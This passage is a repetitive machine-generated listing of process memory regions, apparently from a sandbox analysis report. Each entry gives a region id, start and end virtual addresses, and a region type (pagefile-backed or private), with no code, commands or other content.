"pagefile_0x00000000002a0000" filename = "" Region: id = 17648 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17649 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17650 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17651 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17652 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17653 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17654 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17655 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17656 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17657 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17845 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 17846 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 17847 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 17848 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 17849 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17850 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17851 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17852 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17853 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17854 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17855 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17856 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17857 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17858 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17859 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17860 start_va = 0x2a0000 end_va = 0x2b1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17861 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17862 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17863 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17864 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17865 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17866 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17867 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17868 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17869 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17870 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17871 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17872 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17873 start_va 
= 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17874 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17875 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17876 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17877 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17878 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17885 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17886 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17887 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17888 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17889 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17890 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17891 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 17892 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17893 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17894 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17895 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17896 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17897 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17898 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17899 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17900 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17901 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17902 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17903 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 17904 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001800000" filename = "" Region: id = 17905 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 17906 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 17907 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17908 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17909 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17910 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17911 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17912 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17913 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17914 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17915 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17916 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17952 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17953 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17954 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17955 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17956 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17957 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17958 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17959 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17960 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17961 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17962 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17963 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17964 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17965 start_va = 0x2a0000 end_va 
= 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17966 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17967 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17968 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17969 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17970 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17971 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17972 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17973 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17974 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17975 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17976 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17977 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
17978 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17979 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17980 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17981 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17982 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17983 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17984 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17985 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17986 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17987 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17988 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17989 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17990 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 17991 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18079 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 18080 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18081 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18082 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18083 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18084 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18085 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18086 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18087 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18088 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18089 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18090 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18091 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18092 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18093 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18094 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18095 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18096 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18097 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18098 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18099 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18100 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18101 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18102 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18103 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18104 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18105 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18106 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18107 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18108 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18109 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18110 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18111 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18117 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18118 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18119 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18120 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18121 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18122 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18123 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18124 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18125 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18126 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18127 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18128 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18129 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18130 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18131 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18132 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18133 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 18134 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18135 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18136 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 18137 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18138 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18139 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18140 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18141 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18142 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18143 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18144 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18145 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18146 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 18147 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18148 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18149 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18150 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18151 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18152 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18153 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18154 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18155 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18156 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18157 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18158 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18159 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
